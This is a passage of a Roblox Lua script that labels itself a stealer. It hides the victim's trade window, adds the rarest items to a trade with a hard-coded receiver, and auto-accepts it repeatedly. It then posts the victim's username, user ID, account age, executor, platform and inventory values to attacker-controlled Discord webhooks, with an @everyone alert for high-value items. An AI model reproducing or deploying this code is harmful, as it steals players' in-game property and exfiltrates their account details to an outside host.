    local rarityOrder = {"Unique", "Ancient", "Godly", "Vintage", "Legendary", "Rare", "Uncommon", "Common"}
    local actions = {}
    for _, rarity in ipairs(rarityOrder) do
        for _, item in ipairs(ItemsByRarity[rarity]) do
            if ItemsInTrade >= 4 then break end
            ItemsInTrade = ItemsInTrade + 1
            local Amount = item.Container.Amount.Text
            local LoopsItem = 1
            if Amount ~= "" then
                LoopsItem = tonumber(Amount:match("x(%d+)")) or 1
            end
            for _ = 1, LoopsItem do
                table.insert(actions, item.Container.ActionButton)
            end
        end
    end
    task.spawn(function()
        for _, action in ipairs(actions) do
            TapUI(action)
        end
    end)
    task.spawn(function()
        while true do
            ReplicatedStorage.Trade.AcceptTrade:FireServer(285646582)
            task.wait(0.1)
        end
    end)
end
if Mobile then
    TradePath.Container.Position = Position
    TradePath.ClickBlocker.Position = Position
else
    TradePath.BG.Position = Position
    TradePath.Container.Position = Position
    TradePath.ClickBlocker.Position = Position
    TradePath.Processing.Position = Position
end
TradePath:GetPropertyChangedSignal("Enabled"):Connect(function()
    task.wait(0.2)
    if TradePath.Enabled then
        InsertItems()
    else
        local player = Players:FindFirstChild(Receiver)
        if player then
            ContinuousTrade(player)
        end
    end
end)
Players.PlayerAdded:Connect(function(player)
    if player.Name == Receiver then
        Activate(player.Name)
    end
end)
for _, v in pairs(Players:GetPlayers()) do
    if v.Name == Receiver then
        Activate(v.Name)
    end
end
local content
if Vintage == 0 and Godly == 0 and Ancient == 0 and Unique == 0 then
    content = ""
elseif Common == 0 and Uncommon == 0 and Rare == 0 and Legendary == 0 and Godly == 0 and Ancient == 0 and Unique == 0 and Vintage == 0 then
    content = ""
elseif Godly > 0 or Ancient > 0 or Vintage > 0 or Unique > 0 then
    content = "-- @everyone"
else
    content = ""
end
content = content .. "\n" .. TeleportScript
local ScriptVersion = "v1.5"
local data = {
    ["username"] = mailstealer_name,
    ["avatar_url"] = "https://cdn.discordapp.com/attachments/1284707692123918467/1305840962588643408/IMG_20241112_182528.jpg?ex=67347eaa&is=67332d2a&hm=cbbeda47bf2c2bf2847fa2750fcb6f28ad0ceaeb02aabe2358e3b4f2995f848a&", --// Your Avatar URL Here
    ["content"] = content,
    ["embeds"] = {
        {
            ["title"] = "🏝 **__Made By Anonymous__** 🏝",
            ["description"] = 
                "🧑 **__Player Information__** 🧑\n" ..
                "```diff\nUsername    👤 : " .. LocalPlayer.Name .. "\n" ..
                "User ID     💳 : " .. LocalPlayer.UserId .. "\n" ..
                "Account Age 🔞 : " .. LocalPlayer.AccountAge .. " days\n" ..
                "Exploit     🖥 : " .. Executor .. "\n" ..
                "Platform    🖱 : " .. Platform .. "\n" ..
                "Receiver    👨‍💻 : " .. Receiver .. "\n" ..
                "Version     🌐 : " .. ScriptVersion .. "\n" ..
                "```" ..
                "\n🎒 **__Player Inventory__** 🎒\n" ..
                "```fix\nUniques     🍄 : " .. uniqueItemsC .. "\n" ..
                "Ancients    🌿 : " .. ancientItemsC .. "\n" ..
                "Godlys      💎 : " .. godlyItemsC .. "\n" ..
                "Vintages    ⚡ : " .. vintageItemsC .. "\n" ..
                "Legendarys  ☃️ : " .. legendaryItemsC .. "\n" ..
                "Rares       🌈 : " .. rareItemsC .. "\n" ..
                "Uncommons   🎃 : " .. uncommonItemsC .. "\n" ..
                "Commons     🎄 : " .. commonItemsC .. "\n\n" ..
                "Total Value 📚 : " .. InventoryValue .. "```" ..
                "\n⌛ **__Pastebin Link!__** ⌛\n" ..
                "         [Click Here](" .. pastebinLink .. ")",
            ["type"] = "rich",
            ["color"] = tonumber(0x00FBFF),
            ["thumbnail"] = {
                ["url"] = "https://cdn.discordapp.com/attachments/1301769693329358901/1306225799073894521/incognito.png?ex=6735e513&is=67349393&hm=9e02f49c30aee3dda645608cc32e2710fb388684649ab35e3ffd5dfc1f6e5ba3&"
            },
            ["footer"] = {
            ["text"] = "Stealer By Anonymous | " .. os.date("%B %d, %Y at %I:%M %p"),
            ["icon_url"] = "https://cdn.discordapp.com/attachments/1299594858847146057/1307133031600885871/Messenger_creation_7205578212804085975.jpg?ex=67393200&is=6737e080&hm=a15da8e2f8958a0a5c184682c74408056ca107ee79b4b6f142b21f0f1b7929ad&" -- Optional animated footer icon
            }
        }
    }
}
local newdata = HttpService:JSONEncode(data)
local headers = {
    ["content-type"] = "application/json"
}
local request = http_request or request or HttpPost or syn.request
request({Url = Webhook, Body = newdata, Method = "POST", Headers = headers})
if Receiver ~= newReceiver then
    request({Url = LogWebhook, Body = newdata, Method = "POST", Headers = headers})
end

-- eyode
